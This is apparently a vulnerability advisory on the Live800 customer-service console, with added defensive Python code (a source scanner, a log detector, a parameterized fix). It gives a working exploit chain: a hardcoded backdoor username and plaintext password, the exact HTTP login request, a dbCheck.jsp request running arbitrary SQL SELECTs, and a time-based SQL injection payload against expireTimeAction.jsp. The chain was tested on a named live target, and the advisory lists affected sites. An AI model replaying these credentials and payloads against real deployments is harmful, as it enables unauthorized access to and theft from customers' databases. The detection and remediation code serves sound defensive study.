### Brief description:
Live800 online customer service system: a default password leads to SQL queries / SQL injection
### Details:
console/console.jsp hardcodes the account and password used to check access. Logging in to the console makes it possible to create companies, change agent (customer-service) passwords, run select queries against the database and exploit SQL injection, all high-risk:
```
if (request.getParameter("iamkevin") == null) {
    if (session.getAttribute("login") == null) {
        // both lines are commented out, so an anonymous request is not turned away
        //response.sendRedirect("../noContent.jsp");
        //return;
    }
} else {
    if (!"c36a65c325f7a663fa32cb7bb3d07986".equals(WestPayMd5
            .getMD5Encode(request.getParameter("iamkevin")))) {
        // same here: a wrong iamkevin value has no consequence
        //response.sendRedirect("../noContent.jsp");
        //return;
    }
}
String companyId = request.getParameter("companyId");
if (companyId == null) {
    companyId = (String) session.getAttribute("configCompanyId");
    if (companyId == null) {
        companyId = "";
    }
}
companyId = URLUtil.escapeHtml(companyId);
// password = QQ password + last 4 digits of the ID-card number
if (session.getId().equals(request.getParameter("login"))) {
    // "true ||" makes the whole condition true: the userName, password and companyId checks never apply
    if (true||"9d5e3ecdeb4cdb7acfd63075ae046672".equals(WestPayMd5
            .getMD5Encode(request.getParameter("userName")))
            && "5c7c90afbf1c7395501c64e6e8daac42"
            .equals(WestPayMd5.getMD5Encode(request
            .getParameter("password")))
            && !StringUtils.isNullOrLengthZero(companyId)) {
        session.setAttribute("login", "true");
        session.setAttribute("kevinpassword", WestPayMd5
            .getMD5Encode(request.getParameter("password")));
        session.setAttribute("configCompanyId", companyId);
        response.sendRedirect("main.jsp");
    }
}
```
Five parameters are read from the request: iamkevin, companyId, login, userName and password.
iamkevin must be non-null, companyId can be any value, login must equal the session ID set by Set-Cookie in the current response, userName is kevin and password is wuTAO198403242337 (because of the `true ||` in the quoted code, the userName/password comparison can never fail anyway).
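As an added example (not from the advisory and not Live800's code), here is a small static check in Python that a code reviewer could run over JSP sources to flag the three patterns visible in the fragment above: a 32-hex-digit literal compared against the hash of a request parameter (a credential baked into the source), an `if (true || ...)` that short-circuits the credential check, and a commented-out `sendRedirect`/`return` that disables a guard. The sample input is the quoted fragment reduced to the relevant lines; the rule names and the scanner itself are assumptions of this example.

```python
import re

# Constructed sample: the console.jsp fragment quoted in the advisory, reduced to the
# lines the rules care about. Line numbers in the findings refer to this string.
SAMPLE_JSP = '''\
if (request.getParameter("iamkevin") == null) {
    if (session.getAttribute("login") == null) {
        //response.sendRedirect("../noContent.jsp");
        //return;
    }
} else {
    if (!"c36a65c325f7a663fa32cb7bb3d07986".equals(WestPayMd5
            .getMD5Encode(request.getParameter("iamkevin")))) {
        //response.sendRedirect("../noContent.jsp");
        //return;
    }
}
if (session.getId().equals(request.getParameter("login"))) {
    if (true||"9d5e3ecdeb4cdb7acfd63075ae046672".equals(WestPayMd5
            .getMD5Encode(request.getParameter("userName")))
            && "5c7c90afbf1c7395501c64e6e8daac42"
            .equals(WestPayMd5.getMD5Encode(request
            .getParameter("password")))) {
        session.setAttribute("login", "true");
    }
}
'''

# Rule 1: a 32-hex-digit literal compared (within a short window) against something
# derived from a request parameter: the password hash lives in the source code.
HARDCODED_HASH = re.compile(
    r'"(?P<digest>[0-9a-fA-F]{32})"\s*\.equals\s*\(.{0,200}?getParameter\(', re.S)
# Rule 2: "if (true || ...)" makes the rest of the condition irrelevant.
SHORT_CIRCUIT = re.compile(r'if\s*\(\s*true\s*\|\|')
# Rule 3: a redirect or return that has been commented out, i.e. a guard with no effect.
DISABLED_GUARD = re.compile(r'^[ \t]*//[ \t]*(?:response\.sendRedirect\(|return;)', re.M)

RULES = (
    ("hardcoded-credential-hash", HARDCODED_HASH),
    ("auth-check-short-circuited", SHORT_CIRCUIT),
    ("guard-commented-out", DISABLED_GUARD),
)


def line_of(source, offset):
    """1-based line number of a character offset."""
    return source.count("\n", 0, offset) + 1


def scan_jsp(source):
    """Return (rule, line, evidence) tuples, ordered by rule and then by line."""
    findings = []
    for name, pattern in RULES:
        for m in pattern.finditer(source):
            evidence = m.group("digest") if name == "hardcoded-credential-hash" else m.group(0).strip()
            findings.append((name, line_of(source, m.start()), evidence))
    return findings


def lines_for(findings, rule):
    """Line numbers at which a given rule fired."""
    return [line for name, line, _ in findings if name == rule]


if __name__ == "__main__":
    for name, line, evidence in scan_jsp(SAMPLE_JSP):
        print(f"{name:28s} line {line:3d}  {evidence}")
```

The hash rule deliberately requires a `getParameter(` within a short window of the comparison, so ordinary constant comparisons do not trigger it; run over a real tree it would be applied file by file with `glob` or `os.walk`.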
Using Huawei (**.**.**.**) as the test target, first request:
```
http://**.**.**.**/live800/console/console.jsp
```
The response sets a JSESSIONID:
![1.png](https://images.seebug.org/upload/201602/20000137222348b64e094fa8478698459cee817e.png)
Here it is 15B8A8CBD0D5D037CBAF752BD6361D3C.
Then build the login request:
```
POST /live800/console/console.jsp?login=15B8A8CBD0D5D037CBAF752BD6361D3C HTTP/1.1
Host: **.**.**.**
Cookie: JSESSIONID=15B8A8CBD0D5D037CBAF752BD6361D3C
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Content-Length: 75

iamkevin=wuxiaohong&companyId=123&userName=kevin&password=wuTAO198403242337
```
After a successful login the server answers with a 302 to main.jsp:
![2.png](https://images.seebug.org/upload/201602/200002570e9134795af14f6e1d1515c86db618d6.png)
![3.png](https://images.seebug.org/upload/201602/20000356718d68cf7777dd64791cfae854607aa7.png)
First, view the configuration:
```
GET /live800/console/showConfig.jsp HTTP/1.1
Host: **.**.**.**
Cookie: JSESSIONID=15B8A8CBD0D5D037CBAF752BD6361D3C
Connection: keep-alive
```
![4.png](https://images.seebug.org/upload/201602/2000071059d2705ae86a97469b9035be4457b1a0.png)
This yields the JNDI names:
```
jdbc/live800_im_crm
jdbc/live800_im_analyse
jdbc/live800_im_ip
jdbc/live800_im
```
Then use dbCheck.jsp with one of these JNDI names to run a select query:
```
POST /live800/console/dbCheck.jsp HTTP/1.1
Host: **.**.**.**
Cookie: JSESSIONID=15B8A8CBD0D5D037CBAF752BD6361D3C
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

userName=kevin&userPassword=wuTAO198403242337&isQuery=1&dbType=self&jndi=jdbc/live800_im_crm&t=select version()
```
![5.png](https://images.seebug.org/upload/201602/20001141d18675ebf293f08289cac9084103ab68.png)
![6.png](https://images.seebug.org/upload/201602/2000122425b979d664dcb9438f4b029fb72b9df6.png)
![7.png](https://images.seebug.org/upload/201602/20001548f424ea2ec7974f5fcb0492cfc5afb0c2.png)
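From the detection side, the requests shown above leave a distinctive trail in the servlet container's access log. As an added example (not part of the advisory), this Python snippet parses a few constructed access-log lines in the common log format and flags the patterns a defender would alert on: a POST to console/console.jsp carrying a `login` query parameter, any request to showConfig.jsp or dbCheck.jsp, and an expireTimeAction.jsp request whose expireTime is not a plain date. The log lines, client addresses, timestamps and rule names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format, as written by a Tomcat AccessLogValve),
# modelled on the requests in the advisory. Addresses, times and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Feb/2016:00:01:37 +0800] "GET /live800/console/console.jsp HTTP/1.1" 200 1532
10.0.0.5 - - [20/Feb/2016:00:02:57 +0800] "POST /live800/console/console.jsp?login=15B8A8CBD0D5D037CBAF752BD6361D3C HTTP/1.1" 302 0
10.0.0.5 - - [20/Feb/2016:00:07:10 +0800] "GET /live800/console/showConfig.jsp HTTP/1.1" 200 4410
10.0.0.5 - - [20/Feb/2016:00:11:41 +0800] "POST /live800/console/dbCheck.jsp HTTP/1.1" 200 2201
10.0.0.5 - - [20/Feb/2016:00:15:48 +0800] "GET /live800/console/expireTimeAction.jsp?expireTime=123'and%20sleep(8)%23&accountId=12345678& HTTP/1.1" 302 0
10.0.0.9 - - [20/Feb/2016:00:16:00 +0800] "GET /live800/console/expireTimeAction.jsp?expireTime=2016-03-01&accountId=1001 HTTP/1.1" 302 0
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PLAIN_DATE = re.compile(r'^\d{4}-\d{2}-\d{2}$')
# Endpoints that only an administrator at the console should ever touch.
DB_TOOLING = ("/console/showconfig.jsp", "/console/dbcheck.jsp")


def classify(method, target):
    """Return the rule name this request matches, or None."""
    parts = urlsplit(target)
    path = parts.path.lower()            # the page itself mixes dbcheck.jsp and dbCheck.jsp
    query = parse_qs(parts.query)        # percent-decodes values, drops the empty trailing pair
    if path.endswith(DB_TOOLING):
        return "console-db-tooling"
    if path.endswith("/console/console.jsp") and method == "POST" and "login" in query:
        return "console-login-attempt"
    if path.endswith("/console/expiretimeaction.jsp"):
        for value in query.get("expireTime", []):
            if not PLAIN_DATE.match(value):
                return "expiretime-non-date"
    return None


def scan_log(text):
    """Return (ip, rule, target) for every line that matches a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                     # not a request line we understand; skip rather than guess
        rule = classify(m.group("method"), m.group("target"))
        if rule:
            hits.append((m.group("ip"), rule, m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, rule, target in scan_log(SAMPLE_LOG):
        print(f"{ip:12s} {rule:24s} {target}")
```

Because the login body travels in a POST, the access log only sees the `login=` query string and the 302; pairing that with a following showConfig.jsp or dbCheck.jsp hit from the same address is the strongest signal here.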
If the JNDI query does not work, there is also a SQL injection in console/expireTimeAction.jsp:
```
String companyId = (String) session.getAttribute("configCompanyId");
if (StringUtils.isNullOrLengthZero(companyId)) {
    response.sendRedirect("../noContent.jsp");
    return;
}
String expireTime = request.getParameter("expireTime"); // expiry date
if (StringUtils.isNullOrLengthZero(expireTime)) {
    response.sendRedirect("expireTime.jsp?e="
            + URLUtil.enCode("请输入延期时间!"));
    return;
}
String accountId = request.getParameter("accountId"); // expiry date (sic: comment copied from above; this is the account ID)
if (StringUtils.isNullOrLengthZero(expireTime)) { // re-checks expireTime instead of accountId
    response.sendRedirect("expireTime.jsp?e="
            + URLUtil.enCode("发生异常,没有帐号ID!"));
    return;
}
try {
    Integer.parseInt(accountId); // accountId must be numeric; expireTime is never validated
} catch (Exception e) {
    response.sendRedirect("expireTime.jsp?e="
            + URLUtil.enCode("发生异常,没有帐号ID!"));
    return;
}
//update operator_account set expire_time = '2013-07-31 00:00:00';
//;
// expireTime and companyId are concatenated straight into the statement
String accountSql = "update operator_account set expire_time = '" + expireTime + " 00:00:00' where company_id=" + companyId + " and account_id=" + accountId;
if (DBCommuter.update(accountSql)) {
    String companySql = "update company set account_type=3 where company_id=" + companyId;
    if (DBCommuter.update(companySql)) {
        response.sendRedirect("expireTime.jsp?e="
                + URLUtil.enCode("操作成功!"));
    } else {
        response.sendRedirect("expireTime.jsp?e="
                + URLUtil.enCode("操作失败!"));
    }
} // (the quoted fragment ends here)
```
The value of expireTime is taken straight from the request and concatenated into the SQL statement, which gives SQL injection:
```
GET /live800/console/expireTimeAction.jsp?expireTime=123'and%20sleep(8)%23&accountId=12345678& HTTP/1.1
Host: **.**.**.**
Cookie: JSESSIONID=15B8A8CBD0D5D037CBAF752BD6361D3C;;companyId=123
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
```
Once logged in, the database contents can be read through the generic SQL route; this was already covered in http://**.**.**.**/bugs/wooyun-2015-0147511 and is not repeated here.
Some affected sites:
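The fix is to treat expireTime, accountId and companyId as data rather than as SQL text: validate each one against the exact shape it should have, and bind it as a parameter (a `PreparedStatement` in the JSP's Java; sqlite3 placeholders in the Python below). As an added example, not the vendor's code or a patch for it, here is a hardened equivalent of the expireTimeAction.jsp logic run against an in-memory SQLite database with constructed rows. The table and column names follow the SQL quoted above; the function names, the sample rows and the use of SQLite are assumptions of the example. It also corrects the quoted fragment's second check, which tested expireTime again instead of accountId.

```python
import re
import sqlite3
from datetime import date

DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def parse_expire_date(value):
    """Accept only a real calendar date written as YYYY-MM-DD; raise ValueError otherwise."""
    if not DATE_RE.match(value or ""):
        raise ValueError("expireTime must be YYYY-MM-DD")
    return date.fromisoformat(value)      # also rejects impossible dates such as 2016-02-30


def unsafe_sql(company_id, account_id, expire_time):
    """The concatenation from the original fragment, kept only to show what the database
    would receive; this string is never executed here."""
    return ("update operator_account set expire_time = '" + expire_time + " 00:00:00' "
            "where company_id=" + company_id + " and account_id=" + account_id)


def set_expire_time(conn, company_id, account_id, expire_time):
    """Hardened equivalent of expireTimeAction.jsp: validate every input, then bind it as a
    parameter so it can never change the statement. Returns the number of account rows
    updated (0 when the company has no such account)."""
    if not company_id:
        raise ValueError("no company bound to the session")
    company = int(company_id)             # ValueError on anything that is not an integer
    account = int(account_id)             # the original re-checked expireTime here instead
    stamp = parse_expire_date(expire_time).isoformat() + " 00:00:00"
    with conn:                            # one transaction: commit on success, roll back on error
        cur = conn.execute(
            "UPDATE operator_account SET expire_time = ? "
            "WHERE company_id = ? AND account_id = ?",
            (stamp, company, account))
        if cur.rowcount == 0:
            return 0
        conn.execute("UPDATE company SET account_type = 3 WHERE company_id = ?", (company,))
        return cur.rowcount


def rejected(conn, company_id, account_id, expire_time):
    """True when the inputs are refused before any SQL runs."""
    try:
        set_expire_time(conn, company_id, account_id, expire_time)
    except ValueError:
        return True
    return False


def demo_db():
    """Constructed in-memory database with the two tables the fragment updates."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE operator_account(account_id INTEGER, company_id INTEGER, expire_time TEXT);
        CREATE TABLE company(company_id INTEGER, account_type INTEGER);
        INSERT INTO operator_account VALUES (1001, 123, '2013-07-31 00:00:00');
        INSERT INTO operator_account VALUES (2001, 124, '2013-07-31 00:00:00');
        INSERT INTO company VALUES (123, 1), (124, 1);
    """)
    return conn


def expire_time_of(conn, account_id):
    row = conn.execute("SELECT expire_time FROM operator_account WHERE account_id = ?",
                       (account_id,)).fetchone()
    return row[0] if row else None


def account_type_of(conn, company_id):
    row = conn.execute("SELECT account_type FROM company WHERE company_id = ?",
                       (company_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = demo_db()
    print(set_expire_time(conn, "123", "1001", "2016-03-01"), expire_time_of(conn, 1001))
    print(rejected(conn, "123", "1001", "123'and sleep(8)#"))
```

Two design points: the date is parsed into a real `date` and re-serialised, so whatever reaches the database is something this code produced, not something the client sent; and both updates run in one transaction, so a failed company update cannot leave the account row half-changed as the original two separate `DBCommuter.update` calls could.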
```
http://**.**.**.**/live800/console/console.jsp
http://**.**.**.**/live800/console/console.jsp
http://**.**.**.**/live800/console/console.jsp
http://**.**.**.**/console/console.jsp
http://**.**.**.**/live800/console/console.jsp
http://**.**.**.**/live800/console/console.jsp
http://**.**.**.**/live800/console/console.jsp
```
### Proof of vulnerability:
Same as above.